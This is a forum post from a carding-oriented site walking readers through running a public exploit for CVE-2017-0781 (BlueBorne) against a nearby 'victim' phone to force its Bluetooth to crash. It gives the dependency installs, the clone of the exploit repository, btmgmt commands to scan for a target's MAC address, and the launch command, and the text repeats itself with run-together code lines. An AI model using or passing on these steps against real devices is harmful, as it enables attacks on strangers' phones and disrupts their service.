CarderPlanet
Professional
Good day. Today I would like to tell you about a vulnerability that has been known for a long time ... They just forgot about it for a while, tk. did not spread exploit ... And a miracle happened the other day! A python script was posted on github using a vulnerability (CVE-2017-0781 / Blueborn).
The essence of exploit is to force bluetooth disabling on the "victim" device. Roughly speaking, exploit hits the vulnerabilities of the android firmware (as some people write, ios also works every other time) and causes a null-byte error (buffer overflow).
UPD: It was personally tested on my phone - MEIZU M5 NOTE with the updated Flyme OS.
Let's get started!
> First thing we need to do is install the script dependencies.
Then we update the python modules.
To work with bluetooth using python, we need the pybluez module.
> Then we start downloading the exploit (it would be more correct to call it a script).
> Then we have to sweat ... Because. the problem might be as follows:
Bluetooth does not work .... For this we use the btmgmt utility.
We launch it and take the following steps:
If monitoring of Bluetooth devices starts, then everything is ready.
> We use the script. To do this, we need the MAC address of the bluetooth device (use the btmgmt --index 0 and find command).
As soon as we have found the "victim", we enter the command.
And we are waiting. You can monitor the device from others or through the console.
The essence of exploit is to force bluetooth disabling on the "victim" device. Roughly speaking, exploit hits the vulnerabilities of the android firmware (as some people write, ios also works every other time) and causes a null-byte error (buffer overflow).
UPD: It was personally tested on my phone - MEIZU M5 NOTE with the updated Flyme OS.
Let's get started!
> First thing we need to do is install the script dependencies.
Code:
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essentialThen we update the python modules.
Code:
pip install —upgrade pip
pip install —upgrade pwntoolsTo work with bluetooth using python, we need the pybluez module.
Code:
apt-get install bluetooth libbluetooth-dev
pip install pybluez> Then we start downloading the exploit (it would be more correct to call it a script).
Code:
git clone https://github.com/ojasookert/CVE-2017-0781> Then we have to sweat ... Because. the problem might be as follows:
Bluetooth does not work .... For this we use the btmgmt utility.
We launch it and take the following steps:
Code:
btmgmt --index 0
power
auto-power
findIf monitoring of Bluetooth devices starts, then everything is ready.
> We use the script. To do this, we need the MAC address of the bluetooth device (use the btmgmt --index 0 and find command).
As soon as we have found the "victim", we enter the command.
Code:
python CVE-2017-0781.py TARGET = * mac address with capital letters. *And we are waiting. You can monitor the device from others or through the console.
